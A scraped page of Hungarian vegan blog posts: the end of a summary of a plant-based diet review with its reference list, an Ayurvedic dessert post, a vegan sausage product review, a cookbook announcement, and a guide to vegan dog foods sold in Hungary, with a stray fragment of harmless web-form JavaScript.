cukorbetegeket bevonva. A növényi étrendet tartók 43%-a csökkenthette gyógyszeradagját, míg az ADA-diétáját tartok csupán 23%-áról volt ez elmondható. 2015 októberében a WHO rákkutatással foglalkozó tudományos bizottsága, a Nemzetközi Rákkutató Ügynökség (IARC) 22 kutatója az akkor rendelkezésre álló tudományos eredmények alapján a vörös húsokat a ,,probably carcinogenic to humans - valószínu?leg rákkelto? az emberekre nézve - (2/a) kategóriába, míg a feldolgozott húskészítményeket a ,,carcinogenic to humans - emberekben rákkelto? - (1/a) kategóriába sorolta. Magyarországon és az USA-ban is a szív- és érrendszeri megbetegedések mellett a daganatos megbetegedések is élen járnak az elhalálozást okozó betegségek között. Számos populációt érintő tanulmány kiemelkedő prevenciós eszközként tekint a növényi alapú étrendre és a húsfogyasztás visszaszorítására a daganatos megbetegedések esetében. Zárás a szerzők által: A növényi alapú étrend abban tér el a divatdiétáktól, hogy tudományosan megalapozott állítások összessége alkotja azt. Ahogyan jelen összefoglalásból is kitu?nik, a növényi alapú étrend nem a ,,tudományt használja saját állításai igazolására, hanem a tudományos állítások igazolják sorra a növényi alapú étrend létjogosultságát. Tehát összefoglalva, a növényi alapú étrend nem csak a megelőzésben, hanem súlyos betegségek - szív- és érrendszeri betegségek, cukorbetegség, magas vérnyomás, csontritkulás - kezelésének kiegészítő diétájaként is ajánlott lehet, valamint, ahogy azt már megannyi tudományos tanulmányban olvastuk, úgy most ez a magyar összegzés is rámutat, hogy a megfelelően összeállított tisztán növényi alapú étrend jó hatással van szervezetünkre, és az elfogyasztott mennyiségtől függően, bőven elegendő tápanyagot szolgáltat életünk bármely stádiumában. A tanulmány szerzőjével folytatott pontosítás és beszélgetés során a következőre szeretném felhívni a figyelmet. A vegán vagy növényi alapú étrend, nem a Szent Grál. A rosszul összeállított és nem eléggé változatos növényi étrend hiánybetegségekhez vezethet ugyanúgy, ahogy a nem eléggé változatos vegyestáplálkozású étrend is. Emellett a növényi étrenden élők körében, hajlamosságtól és az élet többi területén a szervezetet ért negatív hatások fényében, ugyanúgy alakulhatnak ki komoly betegségek, ugyanakkor az 100% biztonsággal kijelenthető, hogy a kiegyensúlyozott tisztán növényi étrend betegségek kockázatát csökkenti! Mindezt úgy, hogy nem mellékesen az állatokat is békén hagyjuk. Nagy öröm számomra, hogy Magyarországon született egy ilyen tanulmány és remélem, hogy ez csak a kezdet, hogy hamarosan még több tudományosan megalapozott írással segítik elő a növényi étrend körüli téveszmék felszámolását mások is, akik ebben hivatottak. A tanulmány szerzői, az írás minden állítását a cikk alján is olvasható forrásokkal támasztják alá, számokkal és oldalszámmal is hivatkozva. Az alábbi sorra kattintva érhetitek el a teljes szöveget. (Szabó Zoltán szerző lektorálásával és engedélyével) A tanulmány további szerzői: (nagy köszönet nekik is a munkáért) Erdélyi Attila Dr. Gubicskóné Kisbenedek Andrea A. Ungár Tamás Lászlóné Dr. Polyák Éva Szekeresné Dr. Szabó Szilvia Kovács Réka Erika Raposa László Bence Dr. Figler Mária Pécsi Tudományegyetem, Egészségtudományi Kar, Táplálkozástudományi és Dietetikai Intézete A tanulmányhoz felhasznált irodalom: [1] Lim, S. S., Vos, T., Flaxman, A. D., et al.: A comparative risk as- sessment of burden of disease and injury attributable to 67 risk factors and risk factor clusters in 21 regions, 1990-2010: a sys- tematic analysis for the Global Burden of Disease Study 2010. Lancet, 2012, 380(9859), 2224-2260. [2] Mr. Mallikarjun, Mr. Vijaykumar, S. D.: Nutritional update for physicians: Plant-based diets. International Educ. Scienti c Res. J., 2016, 2(4), 82-83. [3] Palmer, S.: Nutrients of concern for individuals following a plant- based diet. 2014. Available from: http://www.todaysdietitian. com/pdf/courses/PBDNutritentsofConcernPDF.pdf [4] Leitzmann C.: Vegetarian nutrition: past, present, future. Am. J. Clin. Nutr., 2014, 100(Suppl. 1), 496S-502S. [5] Leitzmann, C., Oltersdorf, U.: Possibilities to improve the nutri- tion situation in developing countries. Cologne, Germany: Welt- forum, 1981. [German] [6] Glasauer, P., Leitzmann, C.: Food aid in disasters. 1982. Availa- ble from: http://cidbimena.desastres.hn/docum/crid/Junio 2005/ pdf/eng/doc2793/doc2793-a.pdf [7] Gashu, D., Stoecker, B. J., Adish, A., et al.: Ethiopian pre-school children consuming a predominantly unre ned plant-based diet have low prevalence of iron-de ciency anaemia. Public Health Nutr., 2016, 19(10), 1834-1841. [8] Leitzmann C.: Nutrition ecology: the contributions of vegetarian diets. Am. J. Clin. Nutr., 2003, 78(3 Suppl.), 657S-659S. [9] Steinfeld, H., Gerber, P., Wassenaar, T., et al.: The Livestock, En- vironment and Development. Livestocks longs hadow environ- mental issues and options. Food and Agriculture Organization of the United Nations, Rome, 2006. Available from: ftp://ftp.fao. org/docrep/fao/010/a0701e/a0701e.pdf [10] Marlow, H. J., Hayes, W. K., Soret, S., et al.: Diet and the environ- ment: does what you eat matter? Am. J. Clin. Nutr., 2009, 89(5), 1699S-1703S. [11] Macdiarmid, J., Kyle, J., Horgan, G. W., et al.: Sustainable diets for the future: can we contribute to reducing greenhouse gas emissions by eating a healthy diet? Am. J. Clin. Nutr., 2012, 96(3), 632-639. [12] Ornish, D., Brown, S. E., Scherwitz, L. W., et al.: Can lifestyle changes reverse coronary heart disease? The Lifestyle Heart Tri- al. Lancet, 1990, 336(8708), 129-133. [13] Hu, F. B.: Plant-based foods and prevention of cardiovascular disease: an overview. Am. J. Clin. Nutr., 2003, 78(3 Suppl.), 544S-551S. [14] Gardner, C. D., Coulston, A., Chatterjee, L., et al.: The effect of a plant-based diet on plasma lipids in hypercholesterolemic adults: a randomized trial. Ann. Intern. Med., 2005, 142(9), 725-733. [15] Barnard, N. D., Scialli, A. R., Turner-McGrievy, G., et al.: The effects of a low-fat, plant-based dietary intervention on body weight, metabolism, and insulin sensitivity. Am. J. Med., 2005, 118(9), 991-997. [16] Barnard, N. D., Cohen, J., Jenkins, D. J., et al.: A low-fat vegan diet improves glycemic control and cardiovascular risk factors in a randomized clinical trial in individuals with type 2 diabetes. Diabetes Care, 2006, 29(8), 1777-1783. [17] Lea, E. J., Crawford, D., Worsley, A.: Public views of the bene ts and barriers to the consumption of a plant-based diet. Eur. J. Clin. Nutr., 2006, 60(7), 828-837. [18] Sabaté, J.: The contribution of vegetarian diets to health and dis- ease: a paradigm shift? Am. J. Clin. Nutr., 2003, 78(3), 502S- 507S. [19] Newby, P. K.: Plant foods and plant-based diets: protective against childhood obesity? Am. J. Clin. Nutr., 2009, 89(5), 1572S -1587S. [20] Drewnowski, A., Gomez-Carneros, C.: Bitter taste, phytonutri- ents, and the consumer: a review. Am. J. Clin. Nutr., 2000, 72(6), 1424-1435. [21] Energy and protein requirements. WHO, Geneva, 1985. Available from: http://www.fao.org/docrep/003/aa040e/ AA040E00.htm [22] Rodler, I.: Food and Nutrition Health. [Energia és tápanyagfor- galom. In: Élelmezés- és táplálkozás-egészségtan. (Ed.: Rodler, I.)] Medicina Könyvkiadó, Budapest, 2008, 41-106. [Hungari- an] [23] Henkel, J.: Soy: Health claims for soy protein, questions about other components. FDA Consumer Magazine, 2000, 34(3), 13-15, 18-20. Available from: http://permanent.access.gpo. gov/lps1609/www.fda.gov/fdac/features/2000/300_soy.html [24] Moughan, P. J., Rutherfurd, S. M.: Gut luminal endogenous pro- tein: implications for the determination of ileal amino acid di- gestibility in humans. Br. J. Nutr., 2012, 108(Suppl. 2), S258- S263. [25] Vegan diets. 2015. American Heart Association. Available from: http://www.heart.org/HEARTORG/HealthyLiving/Health- yEating/Vegetarian-Diets_UCM_306032_Article.jsp#.V3ttt- biLTIW [26] Benzie, I. F., Wachtel-Galor, S.: Biomarkers in long-term vegetar- ian diets. Adv. Clin. Chem., 2009, 47, 171-222. [27] Preis, S. R., Stampfer, M. J., Spiegelman, D.: Dietary protein and risk of ischemic heart disease in middle-aged men. Am. J. Clin. Nutr., 2010, 92(5), 1265-1272. [28] Szeto, Y. T., Kwok, T. C., Benzie, I. F.: Effects of a long-term veg- etarian diet on biomarkers of antioxidant status and cardiovascu- lar disease risk. Nutrition, 2004, 20(10), 863-866. [29] Balk, E., Chung, M., Chew, P., et al.: Effects of soy on health outcomes. Evidence Report/Technology Assessment No. 126. (Prepared by Tufts-New England Medical Center Evidence- based Practice Center under Contract No. 290-02-0022.) AHRQ Publication No. 05-E024-2. Agency for Healthcare Re- search and Quality, Rockville, MD, August 2005. [30] Watanabe, F.: Vitamin B12 sources and bioavailability. Exp. Biol. Med., 2007, 232(10), 1266-1274. [31] Chambers, J. C., Ueland, P. M., Obeid, O. A., et al.: Improved vascular endothelial function after oral B vitamins. An effect me- diated through reduced concentrations of free plasma homocyst- eine. Circulation, 2000, 102(20), 2479-2483. [32] Antal, M.: Nutrient requirement. [In: Rodler, I. (ed.): New food composition table.] [Tápanyagszükséglet. In: Rodler, I. (szerk.): Új tápanyagtáblázat. (Ed.: Rodler, I.)] Medicina Könyvkiadó, Budapest, 2005, 61-70. [Hungarian] [33] Saunders, A. V., Craig, W. J., Baines, S. K., et al.: Iron and vege- tarian diets. Med. J. Aust., 2013, 199(4 Suppl.), S11-S16. Avail- able from: https://www.mja.com.au/system/ les/issues/ 196_10_040612_supplement/rei11510_fm.pdf [34] Witters, D.: More than 15% obese in nearly all U.S. metro areas. Gallup, 2012. Available from: http://www.gallup.com/poll/ 153143/Obese-Nearly-Metro-Areas.aspx [35] Berkow, S. E., Barnard, N.: Vegetarian diets and weight status. Nutr. Rev., 2006, 64(4), 175-188. [36] Friedewald, V. E., Boden, W. E., Stone, G. W., et al.: The editors roundtable: role of percutaneous coronary intervention and drug-eluting stents in patients with stable coronary heart disease. Am. J. Cardiol., 2011, 108(10), 1417-1425. [37] Ornish, D., Scherwitz, L. W., Billings, J. H., et al.: Intensive life- style changes for reversal of coronary heart disease. JAMA, 1998, 280(23), 2001-2007. [38] Xu, J., Murphy, S. L., Kochanek, K. D., et al.: Deaths: Final Data for 2013. Natl. Vital Stat. Rep., 2016, 64(2). Available from: http://www.cdc.gov/nchs/data/nvsr/nvsr64/nvsr64_02.pdf [39] IARC Monographs evaluate consumption of red meat and pro- cessed meat. Lyon, France, 26 October 2015. Available from: https://www.iarc.fr/en/media-centre/pr/2015/pdfs/ pr240_E.pdf [40] Pérez-Cueto, F. J., Verbeke, W.: Consumer implications of the WCRFs permanent update on colorectal cancer. Meat Sci., 2012, 90(4), 977-978. [41] Nechuta, S. J., Caan, B. J., Chen, W. Y., et al.: Soy food intake after diagnosis of breast cancer and survival: an in-depth analysis of combined evidence from cohort studies of US and Chinese women. Am. J. Clin. Nutr., 2012, 96(1), 123-132. [42] Richman, E. L., Stampfer, M. J., Paciorek, A., et al.: Intakes of meat, sh, poultry, and eggs and risk of prostate cancer progres- sion. Am. J. Clin. Nutr., 2010, 91(3), 712-721.
Az élet rövid, a desszertet kéne először meg enni...
2016. november 9. Eszemiszom – Jóga Magazin
Azt már többször is áttárgyaltuk, hogy hanem is Ájurvédikusan, de az őseink azért a természet törvényeit követve eléggé jól beállítottak étkezési rendszereket. És ezek a jól bevált rendszerek az egész világban jól működtek mindaddig, ameddig az emberek követték a természet rendjét. Kb. így alakult ki az a desszert kultúra is, hogy az édességet az étkezések végn fogyasztjuk el. Ájurvédikusan ezt úgy magyarázzuk, hogy: - egy részről az édesség nyugtatja a gyomornyálkahártyát, hiszen a legtöbb édesség alapanyag nyákosít, így ha valami túl csípőset, vagy savast ettünk volna, akkor a gyomrunk kicsit ki is engesztelődik. - másodsorban az édes íz erjeszt is, lásd a joghurtot is úgy oltjuk, hogy a tejbe nemcsak joghurt kultúrát rakunk, hanem egy kevés cukrot is. - harmadjára pedig azért is fontos az édesség, mert a cukor szinte azonnal felszívódó energiát biztosít a szervetünknek, ami nagyon kemény munkának van kitéve az emésztés folyamán. TÁÁÁ DÁÁÁÁ! Na ezért fontos a desszert. De, hogy a cikk címének is eleget tegyek, azért van olyan hely Indiában ahol az édességet előre fogyasztják. Gudzsarat államban pl. srikant-tal szokták kezdeni az étkezéseket, ami egy sűrű joghurtos édesség. Ez a joghurt miatt fontos Ájurvédikusan, hiszen a joghurt beindítja a gyomornedvek termelődést és segíti az erjedést is. Itthon is könnyű jó sirkantot csinálni. Majd írok receptet is!!! Om Tat Sat Baktai Ádám Védikus pap, a Védikus tudományok szakértője
Vegan Grill, új vegán húspótló a piacon
2016. október 15. Vegán lettem
A Vegan Grill grillkolbász és hagymás szejtán termékcsalád új szint hoz a Magyarországon kapható vegán termékek piacára grillezhető húshelyettesítő készítményeivel. Az őszi Vegan Food Festen mutatkozott be a Vegán Manufaktúra, a Vegan Grill termékcsaláddal. Kifejezetten grillezni, sütni, pirítani való grillkolbászt és hagymás szejtánt kóstoltattak és ártékesítettek. Azóta termékeikkel beköltöztek pár fővárosi bioboltba, mely boltok folyamatosan bővülő listáját a vegangrill.hu oldalon olvashatjátok. Magyaros, csípős és provence-i ízesítésben kapható a hagymás szejtán, míg magyaros és csípős ízesítésben a grillkolbász. Webes rendeléssel sajnos nem foglalkoznak egyelőre. A Vegan Grill termékcsaládot a Vegán Manufaktúra Kft. forgalmazza, akiktől a jövőben számíthatunk egyéb előrecsomagolt növényi alapú termékekre és termékcsaládra. A Vegan Grill termékek fűszerezését nagyon eltalálták és állaguk megtévesztően hasonlít az igazi húskészítményekéhez. A grillkolbászokat ehetjük reggelire, illetve babfőzelék vagy lecsó mellé is tökéletesen megfelelnek. A hagymás szejtán pedig egy főnyeremény, ha rövid idő alatt valami laktató és finom ételt szeretnél elkészíteni otthon. Amellett, hogy simán olajon vagy növényi zsiradékon pirítva akár kenyérrel vagy bármilyen körettel fogyasztható, komplett pörkölt vagy vagdalt alapként is megállja a helyét a magyaros, csípős és provence-i változata. Rizseshús, zöldborsós tokány vagy akár tarhonyás hús is készíthető az előre csomagolt alapból. A provence-i hagymás szejtánból kicsit modernebb ízvilágú rakott zöldségeket is süthetsz, de lényegében a Vegan Grill termékek elkészítésének csak a képzeleted szabhat határt. A termékekről nem tudok rosszat írni. Lehet ez azért is, mert már a teszt és kóstoló fázisban is jelen voltam és kicsit elfogult vagyok, vagy csak egyszerűen az a helyzet, hogy az én igényeimet mind ízvilágban, mind állagban, mind árban tökéletesen kielégíti a Vegan Grill termékcsalád. Az utóbbi főleg azért is fontos, mivel a vegán húshelyettesítő termékek árai jellemzően az eget verik és a maga 400 grammos csomagonkénti 1000 Ft körüli kiskereskedelmi árával odavághat a piaci árszabásnak. A képeket a Vegan Grill weboldaláról és facebook oldaláról töltöttem le.
A nagy európai vegetáriánus útikalauz
A Hello Magyarok! szerzői - Berki Nikolett ötlete alapján - ugyanis most összeírták az általuk ismert országok kínálta étkezési lehetőségeket vegetáriánusoknak és vegánoknak. Míg sok ország ugyanis maga a földi paradicsom a vegáknak, addig bizony néhány másik helyen elkel a segítség. Halkan pedig megjegyezzük, még olyanoknak is hasznos lehet ez a gyűjtemény, akik bizonyos ételallergiában szenvednek. Az összeállítás első részében Európa országait vesszük sorra, a másodikban pedig kontinensünk határian túl kalandozunk a vegetáriánus gasztronómiában.
Zizi szakácskönyvet ír! :)
2016. szeptember 8. Zizi kalandjai
Eljött ez a pillanat is, hogy végre elmondhatom nektek: szakácskönyvet írok! Igen, én… lesz egy szakácskönyv a polcomon, meg a boltokban, aminek én vagyok a szerzője. Évekkel ezelőtt kezdődött a dolog, először csak álmodozással, hogy egyszer jó lenne egy saját könyv. Csak álmodoztam róla, közben persze “keményen” blogoltam. Álmodoztam arról is, hogy ha egyszer csinálok egy könyvet, akkor azt jó lenne a Boook Kiadóval közösen készíteni, mert ők olyan csodaszép könyveket készítenek. Aztán egyre többen írtatok nekem üzeneteket, emaileket, hogy milyen jó lenne, ha lenne egy könyvem, mert szívesen főznétek abból. Kezdtem elhinni, hogy az álmodozásnak van értelme, másokat is érdekelne egy ilyen dolog. Aztán év elején elindult valami, amikor maga a Boook Kiadó keresett meg, hogy szívesen beszélgetnének velem… egy lehetséges jövőbeli könyvről! Velem! Nem is hittem el először, csak akkor, amikor tényleg leültünk beszélgetni (a néhány hetes Ákossal a mellkasomra kötve, akit közben meg is kellett szoptatnom ). Aztán tavasszal elindult a tervezés és kora nyáron a tényleges munka. Szakácskönyvet írni két kicsi gyerek mellett nem leányálom. Volt olyan, hogy Ákost állva szoptattam miközben a tűzhelyen lévő serpenyőben forgattam a palacsintákat. Tiszta stresszben voltam, hogy nem tudok haladni normálisan, ezért úgy döntöttünk, hogy a szüleimhez “költözünk” recept tesztelésre és könyvírásra. 6-8 kar (szüleim, öcsém, I., szomszéd nénik ) foglalkozott néha a két fiúval, miközben én a konyhában tevékenykedtem vagy a gép előtt ültem és püföltem a billentyűzetet (két szoptatás között). Olyan is volt, hogy bealudtam a fiúkkal este altatáskor, majd éjfélkor riadtan ébredtem, hogy úristen, holnap várják tőlem az újra szerkesztett változatot. Szóval leültem a gép elé éjfélkor és dolgoztam hajnal 2-ig vagy 3-ig! És persze a munkálatok folynak a háttérben egészen addig, amíg a könyv meg nem jelenik! És akkor a téma… miről is szól a szakácskönyvem… a kedvenc napszakom ételeiről, a reggelikről! VEGÁN REGGELIK lesznek benne, csakis olyanok, amelyektől jól fog indulni a napotok! Könnyen, 5 perc alatt elkészíthető turmixoktól, a hétvégi ráérős palacsintákig, kencékig, meleg italokig, de lesz benne kiadós angol reggeli is, meg muffin, meg gofri, meg cukkini kenyér, meg zabkása, meg granola. Igyekeztem egy színes palettát összeállítani, hogy mi miket eszünk rohanós reggeleken, meg ráérős napokon, amikor a reggeli már inkább átmegy brunch-ba (breakfast + lunch = sem nem reggeli, sem nem ebéd, valahol a kettő között). Több mint 70 vegán recept (mindegyik saját fotóval!) kizárólag növényi alapanyagokból (zöldségek, gyümölcsök, gabonák, magvak) készítettek, jó néhány gluténmentes is! Pár recept megtalálható a blogomon, amelyek nagyon népszerűek voltak eddig is, jó néhányat átalakítottam és nagyon sok új recept is van a könyvben. Egy jó kis gyűjtemény, amely segít eligazodni a vegán reggelik útvesztőjében azoknak, akik vegetáriánusok, akik vegánok, de azoknak is, akik egyáltalán nem jártasak ezen konyhában, csak változtatni szeretnének és nem tudják hol kezdjék. Hát kezdjétek a reggeliknél! Ha csak ennyit változtattok a napi étkezésetekben már nagyon sokat tettetek az egészségetekért! Nagyon hálás vagyok a kiadónak, hogy láttak, látnak bennem fantáziát, hogy érdemes velem együtt dolgozni. Köszönöm a kiadó összes munkatársának a sok segítséget, a támogatást… kiemelném Széplaki Pétert a kiadó vezetőjét, Földi Hajnalkát a grafikust, B. Tier Noémit a szerkesztőt, Tóth Milánt a fotóst, Kapolka Ágnest a stylistot. Külön köszönet – a szüleimnek, öcsémnek, hogy bármikor ugrottak, ha segítség kellett és támogatnak mindenben – I.-nek, aki egyébként Iván :), a szeretetéért, hogy fuvarozott mindenhova és elviselte a stresszes hisztiket – Réka barátnőmnek, hogy vigyázott Ákosra a teljes fotózás alatt – a Planetbionak és a Biorganiknak, akik elláttak alapanyagokkal a tesztelésre – és végül, de nem utolsósorban Ádámnak és Ákosnak, a kisfiaimnak, hogy elviselték, anya kicsit kevesebbet foglalkozott velük az elmúlt hónapokban. ,value:1}]},nextButton:null,section:null},22: {field:{actionType:show,logicType:all,rules:[{fieldId:19,operator:,value:2}]},nextButton:null,section:null} }, dependents: { 4: [4],11: [11],22: [22],21: [21] }, animation: 0, defaults: {1:{1.2:,1.3:,1.4:,1.6:,1.8:},23:{23:,23.2:},3:{3.1:,3.2:,3.3:,3.4:,3.5:,3.6:},9:,4:{4.1:,4.2:,4.3:,4.4:,4.5:,4.6:},14:{14.1:,14.2:,14.3:},10:,11:1}, fields: {1:[],23:[],3:[],9:[4],4:[],6:[],14:[],19:[11,22,21],10:[11],11:[],22:[],21:[],17:[],24:[]} }; if(!window[gf_number_format])window[gf_number_format] = decimal_dot;jQuery(document).ready(function(){gf_apply_rules(2, [4,11,22,21], true);jQuery(#gform_wrapper_2).show();jQuery(document).trigger(gform_post_conditional_logic, [2, null, true]);} );} if(window[gformInitPriceFields]) jQuery(document).ready(function(){gformInitPriceFields();} );} } );jQuery(document).bind(gform_post_conditional_logic, function(event, formId, fields, isInit){} ); jQuery(document).ready(function(){jQuery(document).trigger(gform_post_render, [2, 1]) } );
Magyarországon kapható vegán kutyaeledelek
A vegán kutyatartás gyakran erőteljes vitákat vált ki. Ez érthető, hiszen négylábú társaink a mi kis szőrös gyerekeink, akiknek a legjobbat szeretnénk. Én is kétkedve fogadtam legelőször, és nem is foglalkoztam a dologgal egy jó ideig. De miután megismertem Anna három tappancsos családtagját, akik vegán életmódon éltek, és elkezdtem kutakodni a témában, meggyőződtem róla, hogy semmi rosszat nem teszek Tódival. Azóta sok vegán kutyával találkoztam, és eddig még senkitől nem hallottam negatív tapasztalatot. Az első hónapokban különösen odafigyeltem minden szokatlan dologra, de nem hogy romlást nem tapasztaltam, Tódi gyomorsav-problémája is megszűnt, vérképe csodás, 13,5 éves, de rendszeresen 6-8 évesnek nézik. Idősebb vagy túlsúlyos kutyáknak, emésztési illetve szőr- és bőrproblémák esetén egyébként is ajánlott a növényi étrend a könnyen emészthető tápanyagok és a nagyobb mennyiségű rost miatt, allergia esetén pedig a hipoallergén tápok nélkülözhetetlenek. Persze csodát nem tesz ez az étrend sem, nem minden meglévő problémája múlt el, és az idő sajnos neki is fehéríti a pofiját, de egészségi állapota korához képest több mint kielégítő. Miért vegán? De miért vegán? Az elv egyszerű: bár szőrös gyerekeink számunkra sokkal fontosabbak, mint a többi állat, de ahogyan nem vernénk meg egy másik gyereket, hogy a játékait elvegyük, és saját gyerekeinknek adjuk, így más állatok életét sem vesszük el, hogy a családtagjainkat tápláljuk. Szerencsére erre nincs is szükség. Jó ez a kutyának? A kutyák már nem farkasok, emésztésük (és valljuk be, mindenük) óriási mértékben átalakult, mióta velünk élnek. A növényi tápok jelenléte önmagában is azt sugallja, hogy van rá igény (és biztos vagyok benne, hogy nem az “elvetemült vegánok” miatt, mert a vegánok közül sem mindenki eteti vegánul a kutyáját), az allergiás, szőrproblémás és egyéb egészségügyi esetek sajnos egyáltalán nem ritkák. A tápokat szintetikus vitaminokkal dúsítják, legyen szó bármelyik tápról (kivéve talán a legolcsóbbakat), tehát az nem újdonság, hogy ezeket nem csak a “vadonban” lehet megszerezni. A makrotápanyagok (szénhidrát, fehérje, zsír) pedig, az összes aminosavval együtt megtalálható a növényekben. Az olcsóbb és közepesen drága húsos tápokba “emberi fogyasztásra nem alkalmas” húsok és egyéb állati és növényi anyagok kerülnek. Ez jelenthet sok mindent, de nem sok jót. Beteg, daganatos állatok, kicsit romlott hús, nem fogyasztható testrészek, szervek (pl. tisztítatlan belek), csontok lisztté őrölve, gyepmesteri telepeken meghalt állatok testei. Ezen kívül olyan adalékanyagokkal “dúsítják” az eledeleket, amik súlyos, akár halálos megbetegedésekhez vezetnek. Mégis, szinte senkit nem érdekel, ha valaki ilyen hulladékkal eteti a kutyáit. Nyilván van, akinek ennél nem telik többre, de sokan csak nem szánnak rá többet, “jólvanaz”. Ezzel szemben a jól megtervezett, bio vegán táp etetése miatt rögtön “állatkínzót” kiált a nép. Éppen arra, aki nem kínoz senkit, ezzel szemben napokat öl bele a tájékozódásba annak érdekében, hogy mindenkinek a legjobb legyen. A drágább húsos tápokon már sok esetben fel van tüntetve, hogy (kizárólag) emberi fogyasztásra alkalmas húst tartalmaz. Ez viszont azt is jelenti, hogy csak és kizárólag “háziállatok” etetése céljából ölnek meg “haszonállatokat”, nem a melléktermékeket használják fel. De ezek a kategóriák csak a fejünkben léteznek, a malacok okosabbak, mint a kutyák, a szarvasmarhák komplex társas kapcsolatokat tartanak fenn, a tyúkok pedig kb. egy 10 hónapos embergyerek értelmi szintjén vannak. Persze nem a képességeik alapján kellene az élethez való jogukat meghatározni, de így könnyebb elképzelni, mennyire félnek ők is a haláltól, és élni akarnak. További vegán kutyák listája angolul. Állatkísérletek Fontos még szót ejteni az állatkísérletekről. Sajnos nem arról van szó, hogy pár kutyát megkérnek, hogy kóstolják meg az új formulát, ízlik-e nekik. Az egyik állatkísérlet során 24 fiatal kutyának eltávolították az egyik veséjét, majd a bal veséjüket részlegesen szétroncsolták, hogy megállapítsák, a protein hogyan befolyásolja a vesebeteg kutyákat. Nyolc kutya pusztult el ebben a vesekísérletben. Forrás: Origo Állatkísérletes tápok pl.: Hills Pet Nutrition (Colgate-Palmolive), Whiskas, Pedigree, Royal Canin, Sheba, Cesar, Kitekat, Frolic, Chappi, Trill (Mars), Iams, Eukanuba (Procter & Gamble), Tix, Ko-Kra, Romeo, Schnuvki, Chico, Premium, Rufus, Tropic, Purina (Nestlé Purina) És végül a lényeg: a Magyarországon kapható vegán és vegetáriánus tápok, amiket kipróbáltunk, és amiket (még) nem. Yarrah Bio Vegán Amit legelőször kipróbáltunk, az a Yarrah Bio márkájú kutyaeledel. Normál méretű, világos színű és kevéssé olajos kinézetű. Nálunk elfogyott, de láthatóan nem ez volt a kedvence Tódinak. Ennek ellenére olvastam olyan beszámolókat is, ahol a finnyás kutya imádta. A nedves tápjukat és a kutyakekszet viszont nagyon szereti Tódi, ezekről lejjebb olvashatsz. - Állatkísérlet-mentes cég - Hipoallergén táp - 100% vegán Összetevők: Gabona* (búza*, kukorica*), növényi melléktermékek*, (napraforgómag*, búzadara*), szójabab*, élesztő, ásványi anyagok. * = Ellenőrzött biológiai termesztésből, Skal 1301 Adalékanyagok: Tápértékkel rendelkező adalékanyagok: A-vitamin (15.000 NE/kg), D2-vitamin (1.500 NE/kg), E-vitamin [DL-alfa-tokoferol-acetát] (120 NE/kg. Kiszerelések: 10 kg Ár/kg: 1100 Ft Itt rendelheted meg: Zooplus.hu Pitti Boris Vega Közepesen sötét barna színű táp, olajosabb, mint a Yarrah. Tartalmaz D3-Vitamint, amit gyakran gyapjúból vonnak ki, a gyapjú megszerzése pedig sajnos egy rendkívül erőszakos folyamat (videó erősebb idegzetűeknek). Erről, és az állatkísérletekről megkérdeztem őket, update várható. Sok vitamint tartalmaz, és némi cukorrépát is, amit a kutyák szeretnek, de hogy jó-e nekik, az kétséges. Összetevők: Gabona, növényi fehérjekivonatok, növényi melléktermékek, olajok és zsírok, ásványok, magvak, élesztők, cukor. Nyersanyagok: Kukoricaglutén (kb. 25%), rizs (kb. 22%), kukorica (kb. 19%), árpa (kb. 15%), rizs-takarmányliszt (kb. 9%), ásványi anyagok (mono-kalcium-foszfát, kalcium-karbonát, nátrium-klorid, kálium.klorid), kukoricaolaj, lenmag, cukorrépa-apríték, élesztők, hidrolizált élesztő-kivoantok, inulin. Adalékanyagok: Tápértékkel rendelkező adalékanyagok: A-vitamin (14.040 NE/kg), D3-vitamin (1.400 NE/kg), C-vitamin (50 mg/kg), E-vitamin (150 mg/kg), B1-vitamin (3,8 mg/kg), B2-vitamin (5,1 mg/kg), B6-vitamin (3,7 mg/kg), B12-vitamin (27 mcg/kg), nikotinsav (42,1 mg/kg), d-pantotens (18,7 mg/kg), biotin (675 mcg/kg), kolin-klorid (675 mg/kg), folsav (0,9 mg/kg), mangán mint mangán-(II)-oxid (36 mg/kg), réz mint réz-(II)-szulfát (10 mg/kg), cink mint cink-oxid (135 mg/kg), vas mint vas-(II)-szulfát (90 mg/kg), kobalt mint kobalt-(II)-szulfát (1 mg/kg), jód mint kálium-jodid (1 mg/kg), szelén mint nátrium-szelenit (0,2 mg/kg), lecitin (3 g/kg). Kiszerelés: 15 kg Ár/kg: 700 Ft Itt rendelheted meg: Zooplus.hu Trainer Fitness 3 Vegetal Ez a legzsírosabb és a legsötétebb színű a 3 közül, Tódi szereti. - Gabonamentes - Állatkísérlet-mentes - Gyümölcsökkel és gyógynövényekkel Összetevők: Burgonya (45%), borsófehérje, kukoricaolaj (10%), borsó (7%), burgonyafehérje, ásványi anyagok, lenmag, szárított spenót, bab (2,5%), vegetáriánus eredetű hidrolizált fehérje, FOS (frukto-oligo-szacharidok) (0,3%), ligno-cellulóz, ananász-szár szárazkivonat (0,1%), gojicserje szárazkivonat (0,05%), tengeri alga (schizochytrium spp.) (0,05%). Adalékanyagok/kg: Tápértékkel rendelkező adalékanyagok: A-vitamin (26.000 NE/kg), D3-vitamin (1.350 NE/kg), E-vitamin 555 (mg/kg), kolin-klorid (1.800 mg/kg), DL-metionin (4.100 mg/kg), réz-szulfát pentahidrát (50 mg/kg) [réz] (12,5 mg/kg), vas-karbonát (395 mg/kg) [vas] (150 mg/kg), vízmentes kalcium-jodát (25 mg/kg) [jód] (2,5 mg/kg), nátrium-szelenit (20 mg/kg) [szelén] (0,2 mg/kg), cink-oxid (265 mg/kg) [cink] (195 mg/kg), mangán-II-oxid (55 mg/kg) [mangán] (35 mg/kg). Kiszerelés: 12,5 kg Ár/kg: 1 063 Ft Itt rendelheted meg: Zooplus.hu Eledelporta.hu Green PetFood VeggieDog Több verziója létezik, itthon a normál és a csökkentett zsírtartalmú kapható. A tápban található D3 vitamin sajnos állati eredetű, de ezen igyekeznek változtatni. A cég nagyon törekszik a fenntartható megoldások népszerűsítésére. - Papír csomagolás - Öko felfogású vállalat - Gyümölcsökkel, gyógynövényekkel, algával Light (csökkentett zsírtartalmú): Zsírtartalma éppen a Yarrah és a Pitti Boris között van, színe sötétbarna, alakja lapos korong. Ha a D3-vitamin kérdése megoldódna, ez lenne a kedvenc tápunk, Tódi két másodperc alatt felszippantja az adagját, annyira ízlik neki. A szemek alakja miatt gyenge fogacskáival is el tudja őket roppantani, tele van vitaminokkal, a csomagolása pedig minden etetéskor jó érzéssel tölt el. Szakmai ártalom. :) Összetevők: Tönköly 20%, burgonyafehérje, teljes kiőrlésű kukorica, árpa, napraforgóolaj, csillagfürt 5% élesztő (részben hidrolizált), kukoricafehérje, réparost, ásványi anyagok, almarost, 